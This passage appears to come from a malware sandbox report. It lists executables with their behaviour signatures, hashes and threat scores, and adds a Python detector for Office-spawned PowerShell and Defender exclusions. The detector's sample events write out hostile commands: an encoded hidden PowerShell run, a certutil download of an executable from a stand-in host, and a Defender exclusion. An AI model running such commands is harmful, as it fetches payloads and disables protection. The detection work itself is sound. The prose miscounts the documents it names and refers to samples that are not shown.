    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/83682a6a473ca2135d14cbc52c584fb46.exe

    • Size

      73KB

    • MD5

      58055f9b4e9693cc527a5704822bb0b1

    • SHA1

      2997d16203f1bf4d512b1a4dfd41eb8965759456

    • SHA256

      6d37a9d452090fd4ff8fccff8242473ffc4c7a90946faab6f31e06c5d725f5e5

    • SHA512

      6e7af8314c122a9d3a51f85fc420f6429916b1202034ae873d81d13a17f74b6c2163548733b87f4529984bed374b1d4e30223b6d92c2a1218292b33f66989347

    • SSDEEP

      1536:Vj0eb32T01PQb3zTjbM6ptmJTYHjR9Ob4UGpGNx3KfO:hbFMzTFq+N48URAm

    Score
    5/10
    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/882f4c1313d37351d72004caa3ef1aee0.exe

    • Size

      409KB

    • MD5

      1b83a6f8956ec912d04e30591e6c0026

    • SHA1

      6e56d558efb40697afb669fd40100cd007deeeec

    • SHA256

      c164cd72d5927e12bbfa5946b3f9526e27bfe37b1d57fc595c3eb3e94c40b395

    • SHA512

      35e70cdadf7d80072b8092c6ea4e66d73e6f4b0d78f9a3079d3efdb40f305c58aa8865d8664698249d3ab1d0be4f3afabf02c9ac84398fa50d4e3aba350de8be

    • SSDEEP

      12288:2//ZbUXN0kCD9pZ4QQxCQDrX2t9xqkHE7/:23Zbm0BZvQxCgrXS9fo

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/8e751b8765f733f3f7682fd1247a27a70.exe

    • Size

      489KB

    • MD5

      2a4b8fa83e620ebb4fc21488efc16bbe

    • SHA1

      cfc0f3c3a5b015ac235d98245c9d5633749cce38

    • SHA256

      aa169fb465a49976694ffa3d8795d73dab23bc3e11209ddc70aa07577e675d4b

    • SHA512

      647b8ee84ea10262e29307a9ba7b3a055bab4211ce801cf22baf264cd8507533d7370ef1ec12e5576c129b20ee3d547fa06c005722a181e8f226855d5a3560ba

    • SSDEEP

      12288:grxZ//3SfgfZCgOAZw+i+vwnPWybFxJ8fkw:gtZ/VCgOAnAb+l

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/8f6b416bb42a3f168bf083c67687bd533.exe

    • Size

      162KB

    • MD5

      cadd9f366736a8c6a36e6f092672217c

    • SHA1

      3d75c189ebbf5066c66e16c15e92f249925e95d0

    • SHA256

      12087c047dbf2d70e90611276bcb454052ab21643806d90ef2873fd050a97759

    • SHA512

      7caf3555e36fa73f19b6919b0695a3003ab734105550847cba112b9ac69133235edd0b41110d0361a45a94f171debad8afd4f45613e76b1eda95331e7575e17e

    • SSDEEP

      3072:tLzOI+8oz3Y+u1gb2KoTJBJsHZ4AYsRmwRCRJJI3itUWJNesifV:tH2zTu1gbAvMZ4A9RPLpD

    Score
    3/10
    • Target

      uploaded/93h9j2xi5z-safety.exe

    • Size

      191KB

    • MD5

      52460816c25831fd3af5874295804258

    • SHA1

      57465181cc7ac631b6dc2c5af016751ba48f7211

    • SHA256

      08cfd565e6c1b0df6b97b2f0d4a1db78726d3fee08409d05fc628aeb7218a8df

    • SHA512

      ad6b6e92c37575af4d0bdf51faea8b5ea81698494ecd343f8495ceb662fbe0a6a8c5e3caf2e7fb52055dab92ba3d83bb8e22528989f4c7c02a92abfdfed92d61

    • SSDEEP

      1536:gLuVjANSoxkARpL2uZhRmod5LZLK1VmTf:gwjANH4OmmRjj

    Score
    3/10
    • Target

      uploaded/93h9j2xi5z.exe

    • Size

      195KB

    • MD5

      442e1bca83142fd1bea2ba9981e5a879

    • SHA1

      58ff6e1a61419242e5d3f5d23b5ae674b4424b2c

    • SHA256

      043d231d940ab029f8325d828de3b02c13db7df44cbbe4f062068296e2e193a5

    • SHA512

      365363000faf521319801f883e58bf8072d7106929687a59a84d78a8fa68bbd6ffacbeb7600d8721031ca6b883ec691b33d7227434d7c1442608176746e10d31

    • SSDEEP

      1536:WApeiDam0X6krbcTn2uZhRmod5LZLK1VmTf:WAVDam0hbcT2OmmRjj

    • Disables RegEdit via registry modification

    • Disables Task Manager via registry modification

    • Writes to the Master Boot Record (MBR)

      Bootkits write to the MBR to gain persistence at a level below the operating system.

    • Target

      uploaded/AC27_Build3001-UP7-K.exe

    • Size

      764KB

    • MD5

      785382bfcb2e6d9846c103eeb100d17f

    • SHA1

      315342b99c45e1519756bfc496fca8fc88a9fc54

    • SHA256

      e1c91d5cf10150965a98834642fd7c3cefb83cbb8a30e6edcb409641d0da46f3

    • SHA512

      13cda7b0d08062f7b9aae6d3e626d1c4e2e23e2dae18ef6b94dd91f9e5f42214450224d72eac111c6702fed28e4d94363d2d35da09ac6720c61cd622a24d2125

    • SSDEEP

      12288:fZJIvntAvasMjvHQFSZT7vGDZXn2nsoemhygU/uAB5+E84YEaJbnrpp:7IPtaMjvQEJ7u9XnGsYxyuADyuw/H

    Score
    6/10
    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Target

      uploaded/ATR Tool 2.0.exe

    • Size

      2.5MB

    • MD5

      8be31e9bba7de582c4854c683b5aa4be

    • SHA1

      fc76bc8de33392f0ae36efca8a504afcd9ffe945

    • SHA256

      239a024acf03ff8106556ffd3784b9142c6d51611634a035505da705c725987b

    • SHA512

      762abb103a77e6f1fd790c587df5393fb4877d7f71481eeb2061c0f051f54bedee1491d0dc907088e6270aabfda9bbe10d64bb3ba91439b4e29b04d62edbf360

    • SSDEEP

      49152:sDYyMKjoIA7QURY8EoS0uhLh5dpTmX//u86ofe7ecL9wkC4JO75/IkSR:QFMKjnWUoShVppKX/pPCechwke7BDa

    Score
    7/10
    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.
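Three of the Office documents above (Archivo_2001_2021_49-381887.doc, 2531 2212 2020 QG-826729.doc, Refusal-217432546-01212021.xlsm and the .xls) score 10/10 on "Process spawned unexpected child process", two of them combined with "Run PowerShell and hide display window", and one executable scores on PowerShell being used to add Windows Defender exclusions. Those signatures reduce to a handful of checks on process-creation telemetry: an Office parent spawning a script interpreter or LOLBin, a PowerShell command line requesting a hidden window or carrying an encoded command, and an Add-MpPreference/Set-MpPreference call that sets an exclusion. The Python below is an added example, not the sandbox's signature code: it expresses those checks over Sysmon Event ID 1 style fields (Image, ParentImage, CommandLine). SAMPLE_EVENTS are constructed records, not events from this submission, and the rule names and process lists are the author's choice.

```python
# Added example (not the sandbox vendor's code): the "process spawned unexpected child
# process", "hide display window" and "modify Windows Defender settings" signatures above,
# written as checks over Sysmon Event ID 1 style fields. SAMPLE_EVENTS are constructed
# records, not events captured from this submission.
from __future__ import annotations
import ntpath
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                   "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}

# powershell.exe accepts any unambiguous prefix of its switches, so "-w hidden", "-win 1" and
# "-WindowStyle Hidden" all request the same thing (Hidden is enum value 1); likewise "-e",
# "-ec", "-enc" and "-EncodedCommand". The regexes tolerate those abbreviations.
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)[-/]w[a-z]*\s+(?:hidden|1)\b")
ENCODED_COMMAND = re.compile(r"(?i)(?:^|\s)[-/]e(?:c|nc[a-z]*)?(?=\s)")
DEFENDER_EXCLUSION = re.compile(r"(?i)\b(?:Add|Set)-MpPreference\b.*-Exclusion(?:Path|Process|Extension)")

SAMPLE_EVENTS = [  # constructed Sysmon-like records
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd /c "certutil -urlcache -split -f http://example.invalid/a.jpg C:\Users\Public\a.exe"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe Add-MpPreference -ExclusionPath 'C:\Users\Public'"},
    {"ParentImage": r"C:\Windows\explorer.exe",                    # benign: user opens a document
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\alice\Documents\report.docx"'},
]

def evaluate(event: dict) -> list[str]:
    """Names of the rules a single process-creation event trips, in a fixed order."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    child = ntpath.basename(event.get("Image", "")).lower()
    cmd = event.get("CommandLine", "")
    hits: list[str] = []
    if parent in OFFICE_PARENTS and child in SCRIPT_CHILDREN:
        hits.append("office_spawned_script_interpreter")
    if child in {"powershell.exe", "pwsh.exe"}:
        if HIDDEN_WINDOW.search(cmd):
            hits.append("powershell_hidden_window")
        if ENCODED_COMMAND.search(cmd):
            hits.append("powershell_encoded_command")
        if DEFENDER_EXCLUSION.search(cmd):
            hits.append("defender_exclusion_added")
    return hits

def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """(event index, rule names) for every event that trips at least one rule."""
    return [(i, h) for i, e in enumerate(events) if (h := evaluate(e))]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        print(idx, ntpath.basename(SAMPLE_EVENTS[idx]["Image"]), ", ".join(rules))
```

The parent/child rule is the high-value one: it does not depend on the payload and catches the whole xlm4.0 and ps1 dropper chain listed above regardless of which URL it downloads from. It will also fire on legitimate macro-heavy workflows in some environments, so baseline it per parent image before alerting on every hit. The command-line rules only look at powershell.exe and pwsh.exe; a wrapper that goes through cmd.exe first still produces a second event for the PowerShell child, which is why matching is done per event rather than per process tree.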

MITRE ATT&CK Enterprise v16

Tasks

Task           Score   Tags
static1        10/10   upx, macro, macro_on_action, roblox script injector, new, emvlatest, rat, default, aspackv2, noob noname, orcus, asyncrat, neshta, darkcomet, modiloader, xworm, nanocore, umbral
behavioral1    7/10    discovery, persistence
behavioral2    7/10    discovery, persistence, upx
behavioral3    5/10    discovery, upx
behavioral4    6/10    -
behavioral5    10/10   orcus, discovery, rat, spyware, stealer
behavioral6    5/10    discovery, upx
behavioral7    6/10    bootkit, discovery, persistence, upx
behavioral8    1/10    -
behavioral9    10/10   execution
behavioral10   10/10   -
behavioral11   10/10   orcus, discovery, rat, spyware, stealer
behavioral12   10/10   execution
behavioral13   3/10    discovery
behavioral14   7/10    discovery
behavioral15   5/10    discovery, upx
behavioral16   3/10    discovery
behavioral17   8/10    execution
behavioral18   5/10    discovery
behavioral19   7/10    discovery, persistence, upx
behavioral20   6/10    bootkit, discovery, persistence, upx
behavioral21   10/10   execution
behavioral22   5/10    discovery, upx
behavioral23   7/10    discovery
behavioral24   7/10    discovery, persistence, upx
behavioral25   5/10    discovery, upx
behavioral26   7/10    discovery, persistence, upx
behavioral27   7/10    discovery, persistence, upx
behavioral28   3/10    discovery
behavioral29   3/10    discovery
behavioral30   8/10    bootkit, defense_evasion, discovery, persistence
behavioral31   6/10    discovery
behavioral32   7/10    discovery